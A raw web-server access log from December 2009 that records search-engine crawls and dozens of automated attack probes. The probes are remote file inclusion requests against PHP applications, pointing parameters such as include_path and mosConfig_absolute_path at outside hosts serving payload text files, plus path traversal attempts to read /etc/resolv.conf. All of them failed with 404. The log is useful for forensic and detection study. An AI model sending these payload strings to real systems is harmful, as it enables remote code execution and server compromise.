65.55.106.112 - - [16/Dec/2009:00:37:37 -0600] "GET /logs/access_log.1207526400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.31.183 - - [16/Dec/2009:00:38:01 -0600] "GET /logs/access_log.1249776000//skin/happycast_category_lightblack/setup.php?dir=http://sowa.com.mx/site/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
65.55.106.134 - - [16/Dec/2009:00:38:08 -0600] "GET /logs/access_log.1182729600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.31.183 - - [16/Dec/2009:00:38:21 -0600] "GET /logs/access_log.1249776000//skin/happycast_category_lightblack/setup.php?dir=http://sowa.com.mx/site/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
65.55.106.159 - - [16/Dec/2009:00:38:38 -0600] "GET /logs/access_log.1174003200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.21 - - [16/Dec/2009:00:40:08 -0600] "GET /logs/access_log.1249430400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.209.196.76 - - [16/Dec/2009:00:40:33 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Comodo-Certificates-Spider"
74.53.183.210 - - [16/Dec/2009:00:45:43 -0600] "GET /logs/index.php?nic=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:00:45:43 -0600] "GET /index.php?nic=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [16/Dec/2009:00:45:44 -0600] "GET /logs/index.php?nic=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:00:45:45 -0600] "GET /index.php?nic=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
121.101.214.54 - - [16/Dec/2009:00:45:57 -0600] "GET //skin/ggambo7002_boardgallery//write.php?dir=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:00:45:57 -0600] "GET /logs/access_log.1247443200//skin/ggambo7002_boardgallery//write.php?dir=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:00:45:57 -0600] "GET /logs//skin/ggambo7002_boardgallery//write.php?dir=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:00:45:57 -0600] "GET /logs/access_log.1249257600//skin/ggambo7002_boardgallery//write.php?dir=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:00:46:04 -0600] "GET //skin/ggambo7002_boardgallery//write.php?dir=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:00:46:04 -0600] "GET /logs//skin/ggambo7002_boardgallery//write.php?dir=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:00:46:04 -0600] "GET /logs/access_log.1247443200//skin/ggambo7002_boardgallery//write.php?dir=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
121.101.214.54 - - [16/Dec/2009:00:46:04 -0600] "GET /logs/access_log.1249257600//skin/ggambo7002_boardgallery//write.php?dir=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
65.55.106.110 - - [16/Dec/2009:00:46:38 -0600] "GET /logs/access_log.1135209600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
202.218.49.112 - - [16/Dec/2009:00:48:26 -0600] "GET /logs///pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:00:48:26 -0600] "GET ///pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:00:48:26 -0600] "GET /logs/access_log.1246406400///pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.218.49.112 - - [16/Dec/2009:00:48:37 -0600] "GET /logs/access_log.1243468800///pccookbook.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/images/id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
65.55.207.46 - - [16/Dec/2009:00:49:09 -0600] "GET /logs/access_log.1186272000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.30.180.44 - - [16/Dec/2009:00:49:22 -0600] "GET /logs/main.php?link=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 296 "-""-"
217.30.180.44 - - [16/Dec/2009:00:49:22 -0600] "GET /main.php?link=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 291 "-""-"
217.30.180.44 - - [16/Dec/2009:00:49:22 -0600] "GET /logs/main.php?link=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 296 "-""-"
217.30.180.44 - - [16/Dec/2009:00:49:22 -0600] "GET /main.php?link=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 291 "-""-"
65.55.106.229 - - [16/Dec/2009:00:53:37 -0600] "GET /logs/access_log.1216857600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.40.103.14 - - [16/Dec/2009:00:54:40 -0600] "GET /ndex.php?p=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 291 "-""-"
78.110.50.121 - - [16/Dec/2009:00:56:17 -0600] "GET //skin/sirini_simplism_gallery_v4/write.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:00:56:17 -0600] "GET /logs/access_log.1250294400//skin/sirini_simplism_gallery_v4/write.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:00:56:17 -0600] "GET /logs//skin/sirini_simplism_gallery_v4/write.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:00:56:32 -0600] "GET /logs/access_log.1252713600//skin/sirini_simplism_gallery_v4/write.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
64.40.103.14 - - [16/Dec/2009:00:57:22 -0600] "GET /logs/ndex.php?p=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 296 "-""-"
65.55.109.204 - - [16/Dec/2009:01:03:18 -0600] "GET /logs/access_log.1133395200 HTTP/1.1" 200 2924 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
74.86.82.218 - - [16/Dec/2009:01:03:58 -0600] "GET /logs/apps/apps.php?app=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 301 "-""-"
85.17.199.105 - - [16/Dec/2009:01:10:41 -0600] "GET /logs//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:01:10:41 -0600] "GET //plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:01:10:41 -0600] "GET /logs/access_log.1249603200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.107.238 - - [16/Dec/2009:01:11:30 -0600] "GET /logs/access_log.1127001600 HTTP/1.1" 200 1656 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
78.110.50.121 - - [16/Dec/2009:01:11:30 -0600] "GET ///skin/happycast_category_lightblack/setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:11:30 -0600] "GET /logs///skin/happycast_category_lightblack/setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:11:30 -0600] "GET /logs/access_log.1251417600///skin/happycast_category_lightblack/setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.121 - - [16/Dec/2009:01:11:36 -0600] "GET /logs/access_log.1255392000///skin/happycast_category_lightblack/setup.php?setup[use_category]=1&dir=http://www.reducereuserecycle.com.au/modules/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:01:11:42 -0600] "GET /logs/access_log.1248307200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.53.183.210 - - [16/Dec/2009:01:12:09 -0600] "GET /logs/index.php?x=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:01:12:09 -0600] "GET /logs/index.php?x=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 297 "-""-"
74.53.183.210 - - [16/Dec/2009:01:12:10 -0600] "GET /index.php?x=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 292 "-""-"
74.53.183.210 - - [16/Dec/2009:01:12:10 -0600] "GET /index.php?x=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 292 "-""-"
82.98.139.21 - - [16/Dec/2009:01:12:30 -0600] "GET /logs/access_log.1249603200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:12:30 -0600] "GET //plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:12:30 -0600] "GET /logs//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.174.65.34 - - [16/Dec/2009:01:12:44 -0600] "GET //skin/zero_vote/ask_password.php?dir=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 315 "-""-"
81.174.65.34 - - [16/Dec/2009:01:12:45 -0600] "GET //skin/zero_vote/ask_password.php?dir=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 315 "-""-"
82.98.139.21 - - [16/Dec/2009:01:12:49 -0600] "GET /logs/access_log.1248307200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:13:43 -0600] "GET /logs//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:13:43 -0600] "GET //plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:13:43 -0600] "GET /logs/access_log.1249603200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:13:50 -0600] "GET /logs/access_log.1248307200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:14:38 -0600] "GET /logs//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:14:38 -0600] "GET /logs/access_log.1249603200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:14:38 -0600] "GET //plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
65.55.109.156 - - [16/Dec/2009:01:14:41 -0600] "GET /logs/access_log.1127952000 HTTP/1.1" 200 778 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
82.98.136.21 - - [16/Dec/2009:01:14:43 -0600] "GET /logs/access_log.1248307200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:01:22:16 -0600] "GET /logs/access_log.1236988800//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:01:22:16 -0600] "GET /logs/access_log.1237766400//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.106.112 - - [16/Dec/2009:01:23:08 -0600] "GET /logs/access_log.1187049600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.23 - - [16/Dec/2009:01:25:08 -0600] "GET /logs/access_log.1132531200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.22.14.131 - - [16/Dec/2009:01:25:39 -0600] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://195.22.14.131/teste/gorum/lang/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 347 "-""-"
195.22.14.131 - - [16/Dec/2009:01:25:39 -0600] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://195.22.14.131/teste/gorum/lang/albania????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 342 "-""-"
85.17.199.105 - - [16/Dec/2009:01:26:00 -0600] "GET //admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:01:26:00 -0600] "GET /logs//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:01:26:00 -0600] "GET /logs/access_log.1234915200//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:26:06 -0600] "GET //admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:26:06 -0600] "GET /logs//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:26:06 -0600] "GET /logs/access_log.1236643200//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.199.105 - - [16/Dec/2009:01:26:12 -0600] "GET /logs/access_log.1238889600//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:26:15 -0600] "GET /logs//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:26:15 -0600] "GET //admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:26:15 -0600] "GET /logs/access_log.1234915200//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.136.21 - - [16/Dec/2009:01:26:15 -0600] "GET /logs/access_log.1236643200//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:26:46 -0600] "GET /logs/access_log.1236643200//admin.php?include_path=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:26:46 -0600] "GET //admin.php?include_path=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:26:46 -0600] "GET /logs//admin.php?include_path=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:26:46 -0600] "GET //admin.php?include_path=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:26:46 -0600] "GET /logs/access_log.1234915200//admin.php?include_path=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:26:46 -0600] "GET /logs//admin.php?include_path=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.98.139.21 - - [16/Dec/2009:01:26:47 -0600] "GET /logs/access_log.1236643200//admin.php?include_path=http://www.380living.com///modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:27:01 -0600] "GET //admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:27:01 -0600] "GET /logs/access_log.1236643200//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:27:01 -0600] "GET /logs//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:27:08 -0600] "GET /logs/access_log.1238889600//admin.php?include_path=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:29:11 -0600] "GET //includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:29:11 -0600] "GET /logs//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:29:12 -0600] "GET /logs/access_log.1237075200//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://nuthome.net//kirc/connection/noting/id1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:29:36 -0600] "GET //plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:29:36 -0600] "GET /logs//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:29:36 -0600] "GET /logs/access_log.1249603200//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:29:44 -0600] "GET /logs/access_log.1237766400//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:01:29:48 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:01:29:48 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
67.19.51.194 - - [16/Dec/2009:01:29:48 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.157.142.138 - - [16/Dec/2009:01:30:27 -0600] "GET /logs/access_log.1236988800//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.kodohiro.com//modules/xoopsgallery/baner.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
65.55.109.204 - - [16/Dec/2009:01:31:30 -0600] "GET /logs/access_log.1130716800 HTTP/1.1" 200 1769 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
81.174.65.34 - - [16/Dec/2009:01:33:26 -0600] "GET /logs/content.php?inc=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 299 "-""-"
81.174.65.34 - - [16/Dec/2009:01:33:26 -0600] "GET /content.php?inc=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 294 "-""-"
81.174.65.34 - - [16/Dec/2009:01:33:26 -0600] "GET /logs/content.php?inc=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 299 "-""-"
81.174.65.34 - - [16/Dec/2009:01:33:27 -0600] "GET /content.php?inc=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 294 "-""-"
122.201.81.160 - - [16/Dec/2009:01:36:19 -0600] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 329 "-""-"
122.201.81.160 - - [16/Dec/2009:01:36:19 -0600] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://netafreelancer.com/Script-Directory/templates/hbb.txt?&mode=id HTTP/1.1" 404 334 "-""-"
61.47.61.97 - - [16/Dec/2009:01:36:27 -0600] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.47.61.97 - - [16/Dec/2009:01:36:27 -0600] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
61.47.61.97 - - [16/Dec/2009:01:36:27 -0600] "GET /logs/access_log.1247788800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
66.249.71.83 - - [16/Dec/2009:01:36:38 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""Googlebot-Image/1.0"
66.249.71.83 - - [16/Dec/2009:01:36:38 -0600] "GET /michine-vs-storm.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
211.255.32.182 - - [16/Dec/2009:01:36:39 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:01:36:39 -0600] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.255.32.182 - - [16/Dec/2009:01:36:39 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://keparatcrew.webs.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
61.47.61.97 - - [16/Dec/2009:01:36:44 -0600] "GET /logs/access_log.1247788800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
61.47.61.97 - - [16/Dec/2009:01:36:44 -0600] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
61.47.61.97 - - [16/Dec/2009:01:36:44 -0600] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.altenberg.de/cms/components/com_virtuemart/js/slimbox/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
